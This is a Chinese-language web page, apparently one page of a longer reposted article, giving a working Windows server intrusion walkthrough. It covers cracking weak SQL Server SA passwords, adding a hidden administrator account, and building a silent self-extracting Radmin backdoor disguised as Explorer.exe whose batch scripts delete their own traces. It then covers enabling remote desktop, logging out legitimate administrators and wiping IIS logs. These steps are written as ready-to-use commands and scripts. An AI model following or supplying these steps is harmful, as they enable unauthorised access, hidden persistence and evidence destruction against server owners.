SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序)

CleanIISLog.exe(小榕的擦PP程序)

3389.exe(开3389端口服务的)

psu.exe(使用被禁止的Guest帐户要用到的)

mstsc.exe(远程桌面连接程序)

一.扫到SA弱口令..(自动攻击器)

二.用SQLTOOLS连上去建一个用户

net start telnet 开telnet服务

net user skx skx /add 添加用户skx密码为skx
net localgroup administrators skx /add 将帐号skx升级为管理员

三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)

制作RAD.EXE过程:

1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe
2、在本地设置服务端（一定要生成）

设置密码-->>设置连接端口(默认4489)-->>生成

3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg

4、编写一个批处理，并命名为u.bat

--------------------------------------------

@echo off

net stop r_server

--------------------------------------------

5、写第二个批处理，r.bat,内容为

--------------------------------------------

@echo off

@Explorer.exe /uninstall /silence

@Explorer.exe /install /silence

@regedit /s 1.reg

@echo off

@Explorer.exe /uninstall /silence

@Explorer.exe /install /silence

@regedit /s 1.reg

@net start r_server

@del rad.exe

@del 1.reg

@del r.bat

@del u.bat

--------------------------------------------

6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包

7、将Rad.rar制作成自解压文件.

选择Default.sfx的自释放模块-->>高级自释放选项

-->>常规

释放路径:%systemroot%\\system32

安装程序:释放后运行:r.bat 释放前运行u.bat

-->>摸式

缄默模式:全部隐藏覆盖方式:覆盖所有文件

-->>确定-->>确定

生成完成

四.用RADMIN客服端连接....

上传文件到c:\\WINNT(XP是windows):

port.bat(如果是在XP下..这个要把里面的WINNT改为Windows)

query.exe quser.exe

SC.exe

CleanIISLog.exe.exe

3389.exe

psu.exe

最好再上传一个反弹后门

RADMIN进入TELNET

运行 c:\\winnt\\3389.exe

重启肉鸡

五.重启后用远程桌面远程器连上去

这里就有时会出现个问题..

使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。

telnet对方ip。发现需要NTLM 身份验证。

我们在自己的电脑里建立一个帐号skx密码为skx身份为管理员。

找到c:\\winnt\\system32\\cmd.exe 建立一个快捷方式到桌面。

修改cmd的快捷方式属性为允许其他身份登陆。

然后运行桌面上的cmd.exe的快捷方式。输入帐号skx密码skx
telnet对方ip.直接可以登陆对方电脑了。

使用命令

c:\\query user (查看对方目前终端登陆状况。)

运行命令

c:\\logoff 1(踢出去一个管理者)

再用c:\\query user检查一便~~(这就是为什么不马上用1.bat了)

六.连上后..在cmd下运行

c:\\winnt\\log . 自己的IP .(擦PP)

c:\\winnet\\1.bat (删除覆盖查看当前在线用户文件)

七.打SA空口令补丁

程序-->> Microsoft SQL Server-->>查询分析器(有放大镜的)

上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] 下一页

上一篇:微软新P2P工具将面世

下一篇:ASP.NET实现自适应图片大小的弹出窗口(窗口可任意编辑)

UNIX 常用的指令/终结完整编相关文章：

·IE7.0浏览器有用的9个使用技巧

·非主流ps教程实用的技巧大全

·绝对好用的注册表技巧

·常用的网络测试命令

·[狂剑士]狂剑士-最后的心得终结，武器选择，加点

·易学易用的数字五笔输入法

·欣赏:非常实用的button按钮

·推荐：漂亮的手机上使用的墙纸图片分享下载

·PB应用的数据库联接的安全防范

·DIV+CSS常用的网页布局代码

UNIX 常用的指令/终结完整编相关软件：

·QQ密码侦探终结者V2.1

·能源终结者(Robots: Power On!)

·忍者指令(Ninja Commando)

·图标终结者 V3.0

·注册表终结者 V7.5

·《冰封王座》地图：梦之旅团1.41—圣彼得的终结

特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员，我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源：http://www.viphot.com

	\| 帮助(？) \| 版权声明 \| 友情连接 \| 关于我们 \| 信息发布
Copyright 2007 www.viphot.com All Rights Reserved.	鄂ICP备05000083号Powered by:viphot